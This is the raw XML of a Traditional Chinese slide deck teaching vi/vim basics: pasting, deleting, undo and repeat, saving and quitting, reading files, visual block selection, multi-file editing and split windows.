                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>列，且已經複製了 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>列資料。則按下 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>p </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>後， 那 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>列資料會貼在原本的 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>20 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>列之後，亦即由 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>21 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>列開始貼。但如果是按下 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>P </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>呢？ 那麼原本的第 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>20 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>列會被推到變成 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>30 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>列。 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貼上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902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刪除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0989102"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1481138"/>
          <a:ext cx="8229600" cy="481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, X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在一列字當中，</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>x </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>為向後刪除一個字元 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相當於 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>[del] </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>按鍵</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>， </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>X </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>為向前刪除一個字元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相當於 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>[backspace] </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>亦即是倒退鍵</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>) 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err="1" smtClean="0"/>
                        <a:t>nx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n </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>為數字，連續向後刪除 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>n </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>個字元。舉例來說，我要連續刪除 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>個字元， </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>『10x』</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>。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err="1" smtClean="0"/>
                        <a:t>dd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刪除游標所在的那一整列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err="1" smtClean="0"/>
                        <a:t>ndd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n </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>為數字。刪除游標所在的向下 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>n </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>列，例如 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>20dd </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>則是刪除 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>20 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>列 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d1G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刪除游標所在到第一列的所有資料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2651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刪除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3504720"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1481138"/>
          <a:ext cx="8229600" cy="2499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G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刪除游標所在到最後一列的所有資料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d$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刪除游標所在處，到該列的最後一個字元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d0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那個是數字的 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>0 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>，刪除游標所在處，到該列的最前面一個字元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13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復原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2808025"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1481138"/>
          <a:ext cx="8229600" cy="240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2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7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復原前一個動作。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.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這就是小數點！意思是重複前一個動作的意思。 如果你想要重複刪除、重複貼上等等動作，按下小數點</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>『.』</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>就好了！ 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常用</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>)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646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存檔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3437900"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1481138"/>
          <a:ext cx="8229600" cy="441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按鍵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/>
                        <a:t>說明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:w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將編輯的資料寫入硬碟檔案中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:w!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若檔案屬性為</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>『</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>唯讀</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>』</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>時，強制寫入該檔案。不過，到底能不能寫入， 還是跟你對該檔案的檔案權限有關啊！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:q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不存檔離開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q!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若曾修改過檔案，又不想儲存，使用 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>! </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>為強制離開不儲存檔案。</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>注意一下啊，那個驚嘆號 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>(!) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>在 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>vi </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>當中，常常具有</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>『</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>強制</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>』</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>的意思～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523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存檔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2805948"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1481138"/>
          <a:ext cx="8229600" cy="3688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387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08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n1,n2 w [filename]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將 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>n1 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>到 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>n2 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>的內容儲存成 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>filename </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>這個檔案。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:! command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暫時離開 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>vi </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>到指令列模式下執行 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>command </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>的顯示結果！例如</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>『:! ls /home』</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>即可在 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>vi </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>當中察看 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>/home </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>底下以 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>ls </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>輸出的檔案資訊！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270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存檔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8519998"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1481138"/>
          <a:ext cx="8229600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0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590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按鍵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/>
                        <a:t>說明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6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kumimoji="0" lang="en-US" altLang="zh-TW" sz="26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q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儲存後離開，若為 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
                        <a:t>wq</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>! </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>則為強制儲存後離開 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>常用</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>)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600" dirty="0" smtClean="0"/>
                        <a:t>:r [filename]</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2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600" dirty="0" smtClean="0"/>
                        <a:t>在編輯的資料中，讀入另一個檔案的資料。亦即將 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>『filename』 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>這個檔案內容加到游標所在列後面</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2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64480" y="2264400"/>
              <a:ext cx="564480" cy="360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8640" y="2201040"/>
                <a:ext cx="596160" cy="163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627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剛剛我們提到的簡單的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>操作過程中，幾乎提到的都是以列為單位的操作。那麼如果我想要搞定的是一個區塊範圍呢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean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區塊選擇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1724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區塊選擇</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5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690766"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="745232" y="1340768"/>
          <a:ext cx="7499176" cy="490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2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66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5081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9834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v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字元選擇，會將游標經過的地方反白選擇！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V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列選擇，會將游標經過的列反白選擇！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9834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[Ctrl]+v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區塊選擇，可以用長方形的方式選擇資料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y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將反白的地方複製起來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d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將反白的地方刪除掉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p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將剛剛複製的區塊，在游標所在處貼上！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8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862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</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7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4859338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Program (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>程式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概念上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建造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、規劃軟體的藍圖，也可以稱做</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Program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pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>實體上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通常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>是指在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>IDE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Editor(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>程式編輯器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:Notepad++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pycharm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>所寫的程式碼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(code)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，也就是說還放在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>HD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>內而尚未</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>load</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>記憶體</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>執行的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，我們稱之為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Program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pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="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4232520" y="2593080"/>
              <a:ext cx="411840" cy="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216680" y="2529360"/>
                <a:ext cx="4435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筆跡 4"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2873880" y="4291200"/>
              <a:ext cx="3938760" cy="198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58040" y="4227480"/>
                <a:ext cx="397044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7876800" y="3866760"/>
              <a:ext cx="45108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60960" y="3803040"/>
                <a:ext cx="48276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711440" y="4245480"/>
              <a:ext cx="65340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695240" y="4181760"/>
                <a:ext cx="68544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6629400" y="2612520"/>
              <a:ext cx="999720" cy="201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613560" y="2549160"/>
                <a:ext cx="1031400" cy="14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535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zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>想要將剛剛我們的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>hosts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>內的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>複製到你的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>/hosts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>這個檔案去， 那麼該如何編輯？我們知道在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>內可以使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>:r filename </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>來讀入某個檔案的內容， 不過，這樣畢竟是將整個檔案讀入啊！如果我只是想要部分內容呢？呵呵！這個時候多檔案同時編輯就很有用了。 我們可以使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>後面同時接好幾個檔案來同時開啟喔！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多檔案編輯</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5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4240378"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="590872" y="4437112"/>
          <a:ext cx="8229600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9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altLang="zh-TW" sz="2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n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編輯下一個檔案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:N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編輯上一個檔案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:files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列出目前這個 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>vim </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>的開啟的所有檔案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3753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多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>視窗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>編輯</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5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4060133"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="745232" y="1340768"/>
          <a:ext cx="7499176" cy="496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8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5081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9834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:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1" smtClean="0"/>
                        <a:t>sp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t> [filename]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開啟一個新視窗，如果有加 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>filename</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>， 表示在新視窗開啟一個新檔案，否則表示兩個視窗為同一個檔案內容</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>同步顯示</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>。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pl-PL" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>[ctrl]+w+ j</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="pl-PL" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>[ctrl]+w+↓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的按法是：先按下 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>[ctrl] </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>不放， 再按下 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>w </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>後放開所有的按鍵，然後再按下 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>j (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>或向下方向鍵</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>，則游標可移動到下方的視窗。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028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多視窗編輯</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5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0236515"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="745232" y="1412776"/>
          <a:ext cx="7499176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8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5081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按鍵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/>
                        <a:t>說明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9834">
